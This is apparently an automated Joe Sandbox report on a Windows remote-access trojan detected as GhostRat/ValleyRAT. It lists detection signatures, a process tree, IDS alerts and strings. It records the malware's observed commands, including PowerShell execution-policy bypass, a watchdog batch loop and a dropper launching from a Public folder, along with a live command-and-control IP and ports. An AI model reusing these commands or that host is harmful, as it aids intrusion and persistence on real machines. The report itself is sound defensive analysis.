Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6f0slJzOrF.exe

Overview

General Information

Sample name:6f0slJzOrF.exe
renamed because original name is a hash value
Original sample name:E0B31F24AA1B867B395D4F62F15DC51A.exe
Analysis ID:1582215
MD5:e0b31f24aa1b867b395d4f62f15dc51a
SHA1:f3c915a4d1ef71e74978e8f14c809e2d2012e8ad
SHA256:090e553ac4ce1567dddc7548139b14c7645bf1dae7ec608730d6894a783c0b89
Tags:exeValleyRATuser-abuse_ch
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 6f0slJzOrF.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\6f0slJzOrF.exe" MD5: E0B31F24AA1B867B395D4F62F15DC51A)
    • cmd.exe (PID: 7444 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Update.exe (PID: 7496 cmdline: C:\Users\Public\Bilite\Axialis\Update.exe MD5: FB325C945A08D06FE91681179BDCCC66)
        • cmd.exe (PID: 8012 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 8072 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 8092 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 8128 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7316 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7396 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 3748 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7648 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7636 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7708 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 1284 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3176 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 1988 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • cmd.exe (PID: 8144 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1396 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 8152 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5344 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: Update.exe PID: 7496JoeSecurity_GhostRatYara detected GhostRatJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\Update.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\Update.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\Update.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ProcessId: 7496, ProcessName: Update.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Users\Public\Bilite\Axialis\Update.exe, ParentProcessId: 7496, ParentProcessName: Update.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 8144, ProcessName: cmd.exe
    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 154.82.85.79, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\Update.exe, Initiated: true, ProcessId: 7496, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49899
    Source: Process startedAuthor: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 1396, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 1396, ProcessName: powershell.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-30T03:44:29.546494+010020528751A Network Trojan was detected192.168.2.449924154.82.85.7918091TCP
    2024-12-30T03:45:39.297430+010020528751A Network Trojan was detected192.168.2.449953154.82.85.7918091TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: C:\Users\Public\Bilite\Axialis\Update.dllReversingLabs: Detection: 78%
    Source: C:\Users\user\AppData\Local\Temp\backup.dllReversingLabs: Detection: 78%
    Source: 6f0slJzOrF.exeReversingLabs: Detection: 39%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B5DCB CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C1B5DCB
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B56FA CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C1B56FA
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1B556C CryptStringToBinaryA,CryptStringToBinaryA,___std_exception_copy,3_2_6C1B556C

    Compliance

    barindex
    Source: C:\Users\Public\Bilite\Axialis\Update.exeUnpacked PE file: 3.2.Update.exe.4320000.6.unpack
    Source: 6f0slJzOrF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Binary string: \YSS\Release\Update.pdb source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmp, Update.exe, 00000003.00000003.2480482624.00000000015C3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \YSS\Release\Update.pdb0 source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmp, Update.exe, 00000003.00000003.2480482624.00000000015C3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar-x64-700scp.exe.0.dr
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2615239555.0000000006D2F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1778858106.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3548624115.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbo source: powershell.exe, 00000012.00000002.2621611408.0000000007D97000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb50r source: powershell.exe, 00000012.00000002.2615239555.0000000006D2F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2621611408.0000000007D97000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLIST,, source: powershell.exe, 00000012.00000002.2614200432.0000000006C97000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1778858106.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3548624115.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb3w source: powershell.exe, 00000012.00000002.2621611408.0000000007D90000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64-700scp.exe.0.dr
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb( source: powershell.exe, 00000012.00000002.2594552418.0000000000461000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: z:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: x:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: v:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: t:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: r:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: p:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: n:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: l:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: j:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: h:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: f:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: b:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: y:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: w:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: u:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: s:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: q:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: o:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: m:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: k:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: i:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: g:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: e:Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: [:Jump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C32813B FindFirstFileExW,3_2_6C32813B
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3281EC FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6C3281EC
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C2116B5 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,3_2_6C2116B5
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_043280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_043280F0

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49924 -> 154.82.85.79:18091
    Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49953 -> 154.82.85.79:18091
    Source: global trafficTCP traffic: 154.82.85.79 ports 18852,18091,1,2,5,8
    Source: global trafficTCP traffic: 192.168.2.4:49899 -> 154.82.85.79:18852
    Source: Joe Sandbox ViewASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.79
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04322FD0 recv,select,recv,3_2_04322FD0
    Source: Update.exe, 00000003.00000003.2481316048.000000000151C000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: powershell.exe, 00000011.00000002.2594539470.000000000049F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2594653699.00000000004C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000011.00000002.2618375019.0000000007CD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2615239555.0000000006D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
    Source: powershell.exe, 00000012.00000002.2621611408.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
    Source: Update.exe, 00000003.00000003.2481316048.000000000151C000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: Update.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: winrar-x64-700scp.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
    Source: powershell.exe, 00000011.00000002.2606826646.0000000005614000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2609988130.00000000052D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
    Source: Update.exe, 00000003.00000003.2481316048.000000000151C000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
    Source: powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000011.00000002.2595466540.0000000004D5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2595466540.0000000004705000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000011.00000002.2595466540.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2595617657.0000000004271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000011.00000002.2595466540.0000000004D5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2595466540.0000000004705000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: Update.exe, 00000003.00000003.2481316048.0000000001521000.00000004.00000020.00020000.00000000.sdmp, winrar-x64-700scp.exe.0.dr, Update.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: powershell.exe, 00000012.00000002.2615239555.0000000006CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..winsvr
    Source: powershell.exe, 00000011.00000002.2595466540.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2595617657.0000000004271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
